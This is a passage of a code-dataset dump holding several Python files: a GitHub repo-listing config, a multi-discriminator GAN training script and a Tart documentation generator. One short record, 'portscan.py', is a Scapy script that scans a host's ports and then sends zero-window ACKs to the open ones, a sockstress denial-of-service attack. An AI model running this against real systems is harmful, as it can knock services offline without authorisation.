def description(self):\n for f in [\"description\",\"description.txt\"]:\n path = os.path.join(github,self.fullname,f)\n if os.path.exists(path):\n return read(path)\n\n @property\n def ssh_url(self):\n url = \"git@github.com:%s/%s.git\" (user, name)\n if self.org:\n url = \"git@github.com:%s/%s.git\" (self.owner, name)\n return url\n\n @property\n def pypiname(self):\n pkgname = self.repo.split(\".\")[0].lower()\n return pkgname\n\n @property\n def npmname(self):\n if \".py\" in self.repo:\n return\n npmname = self.repo.split(\".\")[0].lower()\n return npmname\n\n @property\n def services(self):\n services=dict()\n path=os.path.join(github,self.fullname)\n if os.path.exists(path) and os.path.isdir(path):\n listdir=os.listdir(path)\n for l in listdir:\n fullpath=os.path.join(path,l)\n if os.path.isdir(fullpath):\n services[l] = Service(fullpath)\n return services\n\n def __str__(self):\n return self.repo\n\n def __repr__(self):\n return self.repo\n\n\nclass Org(object):\n name = None\n\n def __init__(self, name):\n self.name = name\n\n @property\n def description(self):\n path = os.path.join(github, self.name, \"description.txt\")\n if not os.path.exists(path):\n return\n return open(path).read()\n\n @property\n def repos(self):\n return []\n\n @property\n def count(self):\n return len(self.repos)\n\n# ~/.services/github.com/owner/repo/\n# owner.github.com\npath = os.path.join(github,owner)\nif not os.path.exists(path):\n raise OSError(\"%s NOT EXISTS\" % path)\nlistdir = os.listdir(path)\nrepos = []\norgs = []\nfor l in listdir:\n fullpath = os.path.join(path,l)\n if os.path.isdir(fullpath):\n r = Repo(owner=owner,repo=l)\n 
repos.append(r)\n\nrepos = sorted(repos, key=lambda r: r.repo.lower())\n\nlistdir = os.listdir(github)\nfor l in listdir:\n if l.find(\".\")!=0:\n org = Org(l)\n orgs.append(org)\n\nexamples = list(filter(lambda org: org.name.find(\"examples\") >= 0, orgs))\n\ndefault_keys = globals().keys()\n\n# Python\npython = list(filter(lambda r: r.ext == \"py\", repos))\n# Apps\napps = list(filter(lambda r: r.ext == \"app\", repos))\ncli = list(filter(lambda r: r.ext == \"cli\", repos))\nstyle = list(filter(lambda r: \".py\" in r.repo, repos))\ntests = list(filter(lambda r: \".py\" in r.repo or \".cli\" in r.repo, repos))\n\n\nkeys = globals().keys()\nnew_keys = list(set(keys) - set(default_keys))\n__all__ += new_keys\n\nif __name__ == \"__main__\":\n print(\"__all__ = %s\" % __all__)\n print(\"repos: %s\" % len(repos))\n print(\"examples: %s\" % len(examples))\n # for e in examples:\n # print(\"%s (%s)\" % (e.name, e.count))\n print(\"%s cli\" % len(cli))\n print(\"%s python\" % len(python))\n print(\"%s style\" % len(style))\n print(\"%s tests\" % len(tests))\n print(\"%s apps\" % len(apps))\n","sub_path":"dotfiles/jinja/github/site/pages/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"330674644","text":"from scapy.all import * \r\n#scan TCP ports 1-1023 (you can enter a list of ports instead)\r\nans,unans = sr(IP(dst='192.168.1.1')/TCP(sport=RandShort(), dport=(1,1024)))\r\n#print all the RA responses\r\nfor pkt in ans:\r\n\tif pkt[1][TCP].flags == 'RA':\r\n\t\tprint(\"RA:\",pkt[1].sport)\r\n#print all the SA responses\r\nfor pkt in ans:\r\n\tif pkt[1][TCP].flags == 'SA':\r\n\t\tprint(\"SA:\",pkt[1].sport)\r\n#list of packets\r\nnew=[]\r\n#three way handshake all the open TCP ports\r\nfor pkt in ans:\r\n\tack1=pkt[0]\r\n\tpktans=pkt[1]\r\n\tif pkt[1][TCP].flags == 'SA':\r\n\t\tack1[TCP].seq=pktans.ack\r\n\t\tack1[TCP].ack=pktans.seq +1\r\n\t\tack1[TCP].flags='A'\r\n\t\t#to make it sockstress\r\n\t\tack1.window=0\r\n\t\tnew.append(ack1)\r\nsendp(new)\r\nfor item in new:\r\n\tprint(item.show())","sub_path":"portscan.py","file_name":"portscan.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"645993747","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nimport torch.utils.data\nimport torch.backends.cudnn as cudnn\n\nimport random\nimport argparse\n# from models.models_egan import _netG, _netD1, _netD2, _netD3\nfrom models.models_egan import _netG, _netD1, _netD2, _netD3, _netE\n\n# TODO: \n# 1. array-ify\n# 2. adding context to E's input\n# 3. changing Adam optim for D_i to SGD (try and see if better)\n\n # 0. [reg GAN] Critic/G generates Z \n # 1. [reg GAN] D_i outputs p_i(fake)\n # 2. [reg GAN] D_i gets better in regular GAN (but G does not update)\n # 3. [independent of 1 + 2] given X and context, \n # Actor outputs weights W of length len(D_i) \n # (dist/pdf of action space)\n # 4. multiply p_i * W to get final output o\n # 5. use o to train G: if o is correct, penalize, else encourage = loss_G (==loss_critic)\n # 6. loss_actor = -loss_G\n\nparser = argparse.ArgumentParser(description='train SNDCGAN model')\nparser.add_argument('--cuda', action='store_true', help='enables cuda')\nparser.add_argument('--gpu_ids', default=range(3), help='gpu ids: e.g. 0,1,2, 0,2.')\nparser.add_argument('--manualSeed', type=int, help='manual seed')\nparser.add_argument('--n_dis', type=int, default=1, help='discriminator critic iters')\nparser.add_argument('--nz', type=int, default=128, help='dimention of lantent noise')\nparser.add_argument('--batchsize', type=int, default=64, help='training batch size')\n\nopt = parser.parse_args()\nprint(opt)\n\n# dataset = datasets.ImageFolder(root='/home/chao/zero/datasets/cfp-dataset/Data/Images',\n# transform=transforms.Compose([\n# transforms.Scale(32),\n# transforms.CenterCrop(32),\n# transforms.ToTensor(),\n# transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n# ])\n# )\n\ndataset = datasets.CIFAR10(root='dataset', download=True,\n transform=transforms.Compose([\n transforms.Scale(32),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n]))\n\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batchsize,\n shuffle=True, num_workers=int(2))\n\nif opt.manualSeed is None:\n opt.manualSeed = random.randint(1, 10000)\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\n\nif opt.cuda:\n torch.cuda.manual_seed_all(opt.manualSeed)\n torch.cuda.set_device(opt.gpu_ids[0])\n\ncudnn.benchmark = True\n\ndef weight_filler(m):\n classname = m.__class__.__name__\n if classname.find('Conv' or 'SNConv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\nn_dis = opt.n_dis\nnz = opt.nz\n\nG = _netG(nz, 3, 64)\nSND1 = _netD1(3, 64)\nSND2 = _netD2(3, 64)\nSND3 = _netD3(3, 64)\nE = _netE(3, 64, 0, 3)\nprint(G)\nprint(SND1)\nprint(SND2)\nprint(SND3)\nprint(E)\nG.apply(weight_filler)\nSND1.apply(weight_filler)\nSND2.apply(weight_filler)\nSND3.apply(weight_filler)\nE.apply(weight_filler)\n\ninput = torch.FloatTensor(opt.batchsize, 3, 32, 32)\nnoise = torch.FloatTensor(opt.batchsize, nz, 1, 1)\nfixed_noise = torch.FloatTensor(opt.batchsize, nz, 1, 1).normal_(0, 1)\nlabel = torch.FloatTensor(opt.batchsize)\nreal_label = 1\nfake_label = 0\n\nfixed_noise = Variable(fixed_noise)\ncriterion = nn.BCELoss()\n\nif opt.cuda:\n G.cuda()\n SND1.cuda()\n SND2.cuda()\n SND3.cuda()\n E.cuda()\n 
criterion.cuda()\n input, label = input.cuda(), label.cuda()\n noise, fixed_noise = noise.cuda(), fixed_noise.cuda()\n\noptimizerG = optim.Adam(G.parameters(), lr=0.0002, betas=(0, 0.9))\noptimizerSND1 = optim.SGD(SND1.parameters(), lr=0.001, momentum=0.8)\noptimizerSND2 = optim.SGD(SND2.parameters(), lr=0.000002, momentum=0.9)\noptimizerSND3 = optim.SGD(SND3.parameters(), lr=0.0002, momentum=0.99)\noptimizerE = optim.Adam(E.parameters(), lr=0.0002, betas=(0, 0.9))\n\nDE_TRAIN_INTERVAL = 1\nfor epoch in range(200):\n # print(\"Epoch\", epoch, \"starting\")\n for i, data in enumerate(dataloader, 0):\n step = epoch * len(dataloader) + i\n \n real_cpu, _ = data\n batch_size = real_cpu.size(0)\n\n input.resize_(real_cpu.size()).copy_(real_cpu)\n label.resize_(batch_size).fill_(real_label)\n inputv = Variable(input)\n labelv = Variable(label)\n ############################\n # (1) Update D_i networks: maximize log(D_i(x)) + log(1 - D_i(G(z)))\n ###########################\n # train with real\n SND1.zero_grad()\n SND2.zero_grad()\n SND3.zero_grad()\n\n if i % DE_TRAIN_INTERVAL == 0:\n output1 = SND1(inputv)\n output2 = SND2(inputv)\n output3 = SND3(inputv)\n\n errD1_real = criterion(output1, labelv)\n errD1_real.backward(retain_graph=True)\n errD2_real = criterion(output2, labelv)\n errD2_real.backward(retain_graph=True)\n errD3_real = criterion(output3, labelv)\n errD3_real.backward(retain_graph=True)\n\n # train with fake\n noise.resize_(batch_size, noise.size(1), noise.size(2), noise.size(3)).normal_(0, 1)\n noisev = Variable(noise)\n fake = G(noisev)\n labelv = Variable(label.fill_(fake_label))\n output1 = SND1(fake.detach())\n output2 = SND2(fake.detach())\n output3 = SND3(fake.detach())\n\n if i % DE_TRAIN_INTERVAL == 0:\n errD1_fake = criterion(output1, labelv)\n errD1_fake.backward(retain_graph=True)\n errD2_fake = criterion(output2, labelv)\n errD2_fake.backward(retain_graph=True)\n errD3_fake = criterion(output3, labelv)\n errD3_fake.backward(retain_graph=True)\n\n errD1 = errD1_real + errD1_fake\n errD2 = errD2_real + errD2_fake\n errD3 = errD3_real + errD3_fake\n \n if i % DE_TRAIN_INTERVAL == 0:\n optimizerSND1.step()\n optimizerSND2.step()\n optimizerSND3.step()\n\n ############################\n # (2) Run E network: given X and context c, output weights W of length len(D_i)\n # (dist/pdf of action space)\n # multiply p_i * W to get final output o\n ###########################\n # print(\"dimensions of concat output: \", torch.stack((output1, output2, output3)).size())\n # print('inputv', inputv.size())\n # output = torch.mm(W, torch.stack((output1, output2, output3)))\n # output = torch.mean(output, 1)\n W = E(inputv) # 64 x 3\n W = torch.sum(W, dim=0) # size 3\n W = torch.div(W, W.sum()) # normalize weights (sum to 1)\n # W = torch.mm(torch.stack((output1, output2, output3)), W) # size (3,1)\n # W = torch.diag(W) # relevant weights * D_i outputs\n \n # Override W for debugging\n # W[0] = 0\n # W[1] = 0\n # W[2] = 1\n # print(\"W override \", W)\n\n output_weight1 = torch.mul(output1, W[0])\n output_weight2 = torch.mul(output2, W[1])\n output_weight3 = torch.mul(output3, W[2])\n stacked = torch.stack((output_weight1, output_weight2, output_weight3))\n E_G_z1 = torch.sum(stacked.mean(dim=1))\n ############################\n # (3) Update G network: maximize log(D(G(z))*E(X,c)) /////formerly: maximize log(D(G(z)))\n # (4) Update E network: minimize log(D(G(z))*E(X,c))\n ###########################\n if step % n_dis == 0:\n G.zero_grad()\n labelv = Variable(label.fill_(real_label)) # 
fake labels are real for generator cost\n output1 = SND1(fake)\n output2 = SND2(fake)\n output3 = SND3(fake)\n output_weight1 = torch.mul(output1, W[0])\n output_weight2 = torch.mul(output2, W[1])\n output_weight3 = torch.mul(output3, W[2])\n stacked = torch.stack((output_weight1, output_weight2, output_weight3))\n E_G_z2 = torch.sum(stacked.mean(dim=1))\n\n errG1 = torch.mul(criterion(output1, labelv), W[0])\n errG2 = torch.mul(criterion(output2, labelv), W[1])\n errG3 = torch.mul(criterion(output3, labelv), W[2])\n errG = errG1 + errG2 + errG3\n # print(\"errG1 \", errG1)\n # print(\"errG2 \", errG2)\n # print(\"errG3 \", errG3)\n # print(\"Total errG \", errG)\n errG.backward(retain_graph=True)\n\n # DG_E = output.data.mean()\n # DG_E = errG3\n\n optimizerG.step()\n\n # (4) Update E network: minimize log(D(G(z))*E(X,c))\n if i % DE_TRAIN_INTERVAL == 0:\n E.zero_grad()\n errE = -errG\n errE.backward(retain_graph=True)\n optimizerE.step()\n\n if i % 20 == 0:\n print('[%d/%d][%d/%d] Loss_D1: %.4f Loss_D2: %.4f Loss_D3: %.4f Loss_G: %.4f = Loss_log(D(G(z))*E(X,c)) E(G(z)): %.4f / %.4f' % (epoch, 200, i, len(dataloader),\n errD1.data[0], errD2.data[0], errD3.data[0], errG.data[0], E_G_z1, E_G_z2))\n if i % 100 == 0:\n vutils.save_image(real_cpu,\n '%s/real_samples.png' % 'log',\n normalize=True)\n fake = G(fixed_noise)\n vutils.save_image(fake.data,\n '%s/SGD_E_fake_samples_epoch_%03d.png' % ('log', epoch),\n normalize=True)\n\n\n # do checkpointing\ntorch.save(G.state_dict(), '%s/SGD_E_netG_epoch_%d.pth' % ('log', epoch))\ntorch.save(SND1.state_dict(), '%s/SGD_E_netD1_epoch_%d.pth' % ('log', epoch)) \ntorch.save(SND2.state_dict(), '%s/SGD_E_netD2_epoch_%d.pth' % ('log', epoch)) \ntorch.save(SND3.state_dict(), '%s/SGD_E_netD3_epoch_%d.pth' % ('log', epoch)) \ntorch.save(E.state_dict(), '%s/SGD_E_netE_epoch_%d.pth' % ('log', epoch)) \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"train_egan_SGD.py","file_name":"train_egan_SGD.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"444835594","text":"#/bin/python\n\n# TODO: Indexers\n# TODO: Attributes\n# TODO: Name index\n# TODO: Improved InheritDoc\n# TODO: \"Optional\" unions\n# TODO: Better hyperlinking (calculate correct URL from path.)\n# TODO: Type params and method params in urls to disambiguate identical names\n# TODO: Type params in classes\n# TODO: Frames\n# TODO: Deprecated\n# TODO: Search\n# TODO: Accordion Index\n\nimport sys, os\nfrom optparse import OptionParser\nfrom xml.etree import ElementTree\nfrom collections import defaultdict\n\n# Options\nparser = OptionParser()\nparser.add_option(\"-i\", \"--input\", dest=\"infile\",\n help=\"input XML documentation file\", metavar=\"FILE\")\nparser.add_option(\"-o\", \"--output-dir\", dest=\"outdir\",\n help=\"output directory\", metavar=\"DIR\")\nparser.add_option(\"-t\", \"--template-dir\", dest=\"template\",\n help=\"directory for source templates\", metavar=\"DIR\")\nparser.add_option(\"-p\", \"--path\", dest=\"path\", action=\"append\",\n help=\"additional path directories\", metavar=\"DIR\")\nparser.add_option(\"-c\", \"--custom\", dest=\"cust\", action=\"append\",\n help=\"load additional templates for customization\", metavar=\"FILE\")\n\n# Parse options\n(options, args) = parser.parse_args()\n\n# Add the path argument to sys.path\nsys.path.extend(options.path)\nfrom genshi.template import TemplateLoader\nfrom genshi.core import Markup\n\n# Create the template loader\nloader = TemplateLoader(os.path.join(os.path.dirname(__file__), 'templates'))\n\n# The set of tag names representing definitions\nDEFN_TAGS = set([\n \"namespace\",\n \"typedef\",\n \"method\",\n \"macro\",\n \"var\",\n \"let\",\n \"property\",\n \"indexer\",\n \"econst\",\n \"override\",\n \"undef\"])\n\nCALLABLES = set([\n \"method\",\n \"macro\",\n \"override\",\n \"undef\"])\n\nCOMPOSITES = set([\n \"class\",\n \"interface\",\n \"struct\",\n \"protocol\"])\n\nclass Filter(object):\n \"Filter predicates for selecting members of a scope\"\n @staticmethod\n def group_eq(group):\n \"A filter that accepts definitions in a particular group, such as exceptions or attributes\"\n def filter(decl):\n return decl.el.attrib.get('group') == group\n return filter\n \n @staticmethod\n def group_nil(el):\n \"A filter that only accepts definitions with no group attribute\"\n def filter(decl):\n return 'group' not in decl.el.attrib\n return filter\n\n @staticmethod\n def type_eq(*types):\n \"A filter that accepts elements with a given metatype, such as 'class' or 'enun'\"\n types = set(types)\n def filter(decl):\n return decl.el.attrib.get('type') in types\n return filter\n \n @staticmethod\n def is_static():\n \"A filter that accepts only static elements\"\n def filter(decl):\n return decl.el.attrib.get('static') == \"true\"\n return filter\n \n @staticmethod\n def is_not_static():\n \"A filter that accepts only non-static elements\"\n def filter(decl):\n return decl.el.attrib.get('static') != \"true\"\n return filter\n \n @staticmethod\n def accept(el, filters):\n \"Helper method that runs a list of filters against an object and returns True if all succeed\"\n for filter in filters:\n if not filter(el): return False\n return True\n \nclass Declaration(object):\n \"A wrapper around an XML element for a definition\"\n def __init__(self, index, package, qualifiedName, name, el, uri):\n self.index = index\n self.package = package\n self.qualifiedName = qualifiedName\n self.name = name\n self.el = el\n self.tag = el.tag\n self.uri = uri\n self._members = []\n self._typeArgs = 
el.findall(\"type-arg/*\")\n self._typeParams = el.findall(\"type-param/*\")\n self.path = self.computePath(qualifiedName)\n \n def computePath(self, qualifiedName):\n path = qualifiedName.split('.')\n if self._typeParams:\n path += tuple(typeidlist(self._typeParams))\n if self._typeArgs:\n path += tuple(typeidlist(self._typeArgs))\n return tuple(path)\n\n def __lt__(self, other):\n return self.qualifiedName.__lt__(other.qualifiedName)\n \n def __str__(self):\n return self.qualifiedName\n \n def __repr__(self):\n return self.tag + ':' + self.qualifiedName\n \n def addMember(self, m):\n \"Add a child member to this member's scope\"\n assert m\n self._members.append(m)\n\n def declarator(self):\n \"Returns the declaring keyword of this definition\"\n return self.el.tag\n \n def scopeName(self):\n return self.qualifiedName.rsplit('.', 1)[0]\n\n def visibility(self):\n return self.el.attrib.get('visibility')\n \n def storage(self):\n \"Returns the storage-class of this definition\"\n return 'static' if self.el.attrib.get('static') == 'true' else ''\n \n def members(self, tag=None, *filters):\n result = []\n for member in self._members:\n if member.tag == tag \\\n and Filter.accept(member, filters) \\\n and member.el.attrib.get('visibility') != 'private':\n result.append(member)\n result.sort()\n return result\n\n def inherits(self):\n \"Return the list of all base types\"\n return []\n\n def implements(self):\n \"Return the list of all implemented interfaces\"\n return []\n\n def inheritedBy(self):\n \"Return the list of all sub classes\"\n return []\n\n def implementedBy(self):\n \"Return the list of all implementing classes\"\n return []\n\n def params(self):\n return self.el.findall(\"./doc/parameter\")\n \n def returns(self):\n return self.el.find(\"./doc/returns\")\n \n def throws(self):\n return self.el.findall(\"./doc/exception\")\n\n def summary(self):\n summary = self.el.find(\"./doc/summary\")\n if summary is not None:\n return inner_html(summary)\n\n first_para = self.el.find(\"./doc/description/p\")\n if first_para is not None:\n return inner_html(first_para)\n \n return \"\"\n\n def hasDescription(self):\n return self.el.find(\"./doc/description\")\n \n def description(self):\n desc = self.el.find(\"./doc/description\")\n if desc is not None:\n return inner_html(desc)\n return \"\"\n \n def hasDeprecated(self):\n return self.el.find(\"./doc/deprecated\")\n \n def deprecated(self):\n content = self.el.find(\"./doc/deprecated\")\n if content is not None:\n return inner_html(content)\n return \"\"\n \n def typeArgs(self):\n return self._typeArgs\n\n def typeParams(self):\n return self._typeParams\n\n def formatDeclarator(self):\n mods = []\n if self.visibility() != 'public':\n mods.append(self.visibility())\n if self.el.attrib.get('static') == 'true':\n mods.append('static')\n if self.el.attrib.get('abstract') == 'true':\n mods.append('abstract')\n if self.el.attrib.get('final') == 'true':\n mods.append('final')\n mods.append(self.declarator())\n mods.append(' ')\n return Markup(' ').join(mods)\n \n def formatName(self, makeLink):\n if self.name == \"$call\": return ''\n if makeLink:\n return Markup('').join([\n Markup('' % self.uri),\n self.name,\n Markup('')])\n else:\n return Markup('').join([\n Markup(''),\n self.name,\n Markup('')])\n \n def formatTypeSignature(self):\n return ''\n tag = self.el.tag\n if tag == 'let' or tag == 'var' or tag == 'property':\n return Markup('').join([':', self.index.formatType(self.el.find('type/*'))])\n return ''\n \n def formatDeclaration(self, 
makeLink):\n return Markup('').join([\n self.formatName(makeLink),\n self.index.formatTypeParamList(self.typeArgs()),\n self.index.formatTypeParamList(self.typeParams()),\n self.formatTypeSignature()])\n \n def compressedText(self, el):\n result = []\n first = True\n for child in el:\n if first and child.tag == \"p\":\n result.append(inner_html(child))\n first = False\n else:\n result.append(outer_html(child))\n return Markup('').join(result)\n \nclass Module(Declaration):\n \"Represents a Tart module.\"\n def __init__(self, index, package, qualifiedName, name, el, uri):\n super(Module, self).__init__(index, package, qualifiedName, name, el, uri)\n\nclass Typedef(Declaration):\n \"Represents a Tart type definition.\"\n def __init__(self, index, package, qualifiedName, name, el, uri):\n super(Typedef, self).__init__(index, package, qualifiedName, name, el, uri)\n\n # Preprocess list of bases\n self._inherits = []\n self._implements = []\n self._inheritedBy = []\n self._implementedBy = []\n kind = el.attrib['type']\n for base in el.findall('./base-type/*'):\n baseKind = typeKind(base)\n if kind == baseKind:\n self._inherits.append(base)\n else:\n self._implements.append(base)\n\n def declarator(self):\n return self.el.attrib['type']\n\n def inherits(self):\n return self._inherits\n\n def implements(self):\n return self._implements\n \n def inheritedBy(self):\n return self._inheritedBy\n\n def implementedBy(self):\n return self._implementedBy\n \nclass Method(Declaration):\n \"Represents a Tart method.\"\n def declarator(self):\n if self.el.tag == 'method': return \"def\"\n return self.el.tag\n\n def formatTypeSignature(self):\n params = []\n for param in self.el.findall('param'):\n psig = Markup('').join(\n [Markup(''), param.attrib['name'], Markup('')])\n param_type = param.find('type/*')\n if param_type is not None:\n psig = Markup(':').join([psig, self.index.formatType(param_type)])\n params.append(psig)\n result = [\n \"(\",\n Markup(\", \").join(params),\n Markup(''),\n \")\"]\n ret = self.el.find('return-type/*')\n if ret is not None:\n result.append(\" -> \")\n result.append(self.index.formatType(ret))\n result.append(Markup(''))\n return Markup('').join(result)\n\nclass Field(Declaration):\n \"Represents a Tart variable or property.\"\n def formatTypeSignature(self):\n return Markup('').join([':', self.index.formatType(self.el.find('type/*'))])\n \nclass Package(object):\n \"Represents a package.\"\n def __init__(self, index, name, url):\n self.index = index\n self.name = name\n self.url = url\n self._modules = []\n self._members = []\n\n def __lt__(self, other):\n return self.name.__lt__(other.name)\n \n def addModule(self, m):\n self._modules.append(m)\n\n def addMember(self, m):\n self._members.append(m)\n\n def modules(self, tag=None, *filters):\n \"Return the members of this package which match the given query criteria\"\n result = []\n for module in self._modules:\n result.extend(module.members(tag, *filters))\n result.sort()\n return result\n \n def members(self, tag=None, *filters):\n \"Return the members of this package which match the given query criteria\"\n result = []\n for member in self._members:\n if (tag == member.tag or (tag is None and member.tag in DEFN_TAGS)) \\\n and Filter.accept(member, filters) \\\n and member.el.attrib.get('visibility') != 'private':\n result.append(member)\n result.sort()\n return result\n \nclass SymbolIndex(object):\n \"Index of all declared symbols\"\n def __init__(self, document):\n self.nameIndex = defaultdict(list)\n self.pathIndex = 
defaultdict(list)\n self.packageIndex = {}\n self.pages = []\n self.undocPages = defaultdict(lambda: 0)\n self.buildModuleIndex(document.getroot())\n self.buildSubclassIndex()\n\n def makeUri(self, qualifiedName, relativeTo=None):\n # The 'outer' path is the path to the top-level symbol within a module.\n # The 'inner' path is the relative path from the top-level symbol to the declaration.\n outerPath = qualifiedName.split('.')\n innerPath = []\n while outerPath:\n pages = self.pathIndex.get(tuple(outerPath))\n if pages: break\n innerPath.insert(0, outerPath.pop())\n\n # If we never found a package, then no link.\n if not pages:\n return None\n\n # Construct the URL\n result = pages[0].uri\n if innerPath:\n result += '#' + \".\".join(innerPath)\n return result\n\n def makePageUri(self, prefix, path):\n return \"-\".join((prefix,) + path) + \".html\"\n \n def lookup(self, path, basePath=None):\n result = self.pathIndex.get(path)\n# if not result:\n# pass\n return result\n\n def buildModuleIndex(self, rootEl):\n for el in rootEl:\n module = self.module(el)\n \n def buildSubclassIndex(self):\n for mlist in self.pathIndex.values():\n for m in mlist:\n if isinstance(m, Typedef):\n for base in m.inherits():\n baseType = self.findBase(base)\n if baseType:\n baseType._inheritedBy.append(m)\n for base in m.implements():\n baseType = self.findBase(base)\n if baseType:\n baseType._implementedBy.append(m)\n\n def module(self, el):\n path = tuple(el.attrib['name'].split('.'))\n qualifiedName = \".\".join(path)\n packagePath = path[:-1]\n name = path[-1]\n package = self.getOrCreatePackage(packagePath)\n uri = self.makePageUri(\"module\", path)\n module = Module(self, package, qualifiedName, name, el, uri)\n package.addModule(module)\n for childEl in el:\n if childEl.tag in DEFN_TAGS:\n decl = self.declaration(childEl, module, True, None, None)\n module.addMember(decl)\n if decl.name == module.name:\n package.addMember(decl)\n\n def declaration(self, el, parent, topLevel, uriBase, pageDecl):\n name = el.attrib['name']\n uriPrefix = el.attrib['type'] if el.tag == 'typedef' else el.tag\n if topLevel:\n qualifiedName = parent.package.name + '.' + name;\n else:\n qualifiedName = parent.qualifiedName + '.' 
+ name;\n path = tuple(qualifiedName.split('.'))\n \n hasOwnPage = topLevel\n if el.tag == 'typedef' and el.attrib['type'] in COMPOSITES:\n hasOwnPage = True\n\n if hasOwnPage:\n uri = self.makePageUri(uriPrefix, path)\n else:\n uri = uriBase\n if '#' in uri: uri += '-' + name\n else: uri += '#' + name\n\n if el.tag in CALLABLES:\n decl = Method(self, parent.package, qualifiedName, name, el, uri)\n elif el.tag == 'typedef':\n decl = Typedef(self, parent.package, qualifiedName, name, el, uri)\n elif el.tag == 'let' or el.tag == 'var' or el.tag == 'property':\n decl = Field(self, parent.package, qualifiedName, name, el, uri)\n else:\n decl = Declaration(self, parent.package, qualifiedName, name, el, uri)\n parent.addMember(decl)\n self.pathIndex[path].append(decl)\n self.nameIndex[name].append(decl)\n if hasOwnPage:\n pageDecl = decl\n self.pages.append(decl)\n if decl.visibility() != 'private' and el.tag != 'econst' and el.find(\"./doc\") is None:\n self.undocPages[pageDecl] += 1\n for childEl in el:\n if childEl.tag in DEFN_TAGS:\n self.declaration(childEl, decl, False, uri, pageDecl)\n return decl\n\n def getOrCreatePackage(self, path):\n if path not in self.packageIndex:\n name = \".\".join(path)\n uri = 'package-' + \"-\".join(path) + \".html\"\n self.packageIndex[path] = package = Package(self, name, uri)\n return package\n else:\n return self.packageIndex[path]\n \n def packages(self):\n return self.packageIndex.values()\n \n def formatTypeParamList(self, types, *options):\n \"Format 'types' as a list of template arguments. Returns a Markup object\"\n return TypeFormatter(self, options).typeParamList(types)\n\n def formatTypeList(self, types, *options):\n \"Format 'types' as a comma-separated list. Returns a Markup object\"\n return TypeFormatter(self, options).typeList(types)\n\n def formatType(self, ty, *options):\n \"Format 'type' as text. 
Returns a Markup object\"\n if isinstance(ty, Typedef):\n return TypeFormatter(self, options).a(ty.qualifiedName, ty.uri, 'type-name-link')\n return TypeFormatter(self, options).type(ty)\n\n def findBase(self, el):\n if el.tag == 'typename':\n path = tuple(el.text.split('.'))\n decl = self.lookup(path)\n if decl and len(decl) == 1:\n return decl[0]\n if not decl:\n return None\n else:\n assert False and \"Ambiguous lookup: \" + ElementTree.tostring(el.text)\n elif el.tag == 'template-instance':\n return self.findBase(el.find('typename'))\n else:\n assert False and ElementTree.tostring(el)\n\nclass TypeFormatter(object):\n \"Helper class that formats type expressions as markup objects\"\n def __init__(self, index, options):\n self.index = index\n self.options = set(options)\n\n def typeParamList(self, types):\n if types:\n return Markup('').join(['[', self.typeList(types), ']'])\n return ''\n\n def typeList(self, types):\n return Markup(\", \").join(self.type(ty) for ty in types)\n\n def typeContent(self, el):\n return self.type(list(el)[0])\n\n def type(self, el):\n M = Markup\n if el.tag == 'typename':\n name = el.text\n if name.startswith(\"tart.core.\"): name = name[10:]\n if 'hlink' in self.options and el.attrib['type'] != 'primitive':\n uri = self.index.makeUri(el.text)\n return self.a(name, uri, 'type-name-link')\n else:\n return self.span(name, 'type-name')\n elif el.tag == 'type-variable':\n name = el.attrib['name']\n if 'tsig' in self.options: return self.concat('%', self.span(name, 'type-variable-name'))\n else: return self.span(name, 'type-name')\n elif el.tag == 'array':\n return self.concat(self.typeContent(el), \"[]\")\n elif el.tag == 'variadic':\n return self.concat(self.typeContent(el), \"...\")\n elif el.tag == 'address':\n return self.concat('Address[', self.typeContent(el), ']')\n elif el.tag == 'tuple':\n return self.concat('(', self.typeList(el.findall(\"*\")), ')')\n elif el.tag == 'union':\n return Markup(\" or \").join(self.type(ty) for ty in el.findall(\"*\"))\n elif el.tag == 'template-instance':\n return self.concat(\n self.typeContent(el),\n self.typeParamList(el.findall(\"template-arg/*\")))\n else:\n return self.concat(el.tag, \"??\")\n\n def concat(self, *args):\n return Markup('').join(args)\n \n def a(self, content, href, cls):\n return self.concat(\n Markup('' % (href, cls)), content, Markup(''))\n \n def span(self, content, cls):\n return self.concat(\n Markup('' % cls), content, Markup(''))\n\nclass DocGenerator(object):\n \"The main driver class\"\n def __init__(self, index, custom=[]):\n # Create the template loader\n self.loader = TemplateLoader(os.path.join(os.path.dirname(__file__), 'templates'))\n \n # Symbol index\n self.index = index\n\n # Custom templates \n self.custom = custom\n \n def generate(self):\n self.writePackageIndex()\n self.writePackages()\n self.writeDefinitions()\n self.writeTypes()\n self.writeNamespaces()\n self.writeHierarchy()\n self.writeTODO()\n\n def resetcounter(self):\n self.counter = 0\n \n def evenodd(self):\n self.counter += 1\n return 'row-even' if (self.counter & 1) == 0 else ''\n \n def writeTemplate(self, template, outputfile, **kwargs):\n if not os.path.exists(options.outdir):\n os.makedirs(options.outdir)\n outfile = os.path.join(options.outdir, outputfile)\n # print \"Generating:\", outfile\n template = loader.load(template)\n stream = template.generate(gen=self, si=self.index, **kwargs)\n content = stream.render('html', doctype='html5', encoding=\"UTF-8\", strip_whitespace=True)\n fh = open(outfile, \"w\")\n 
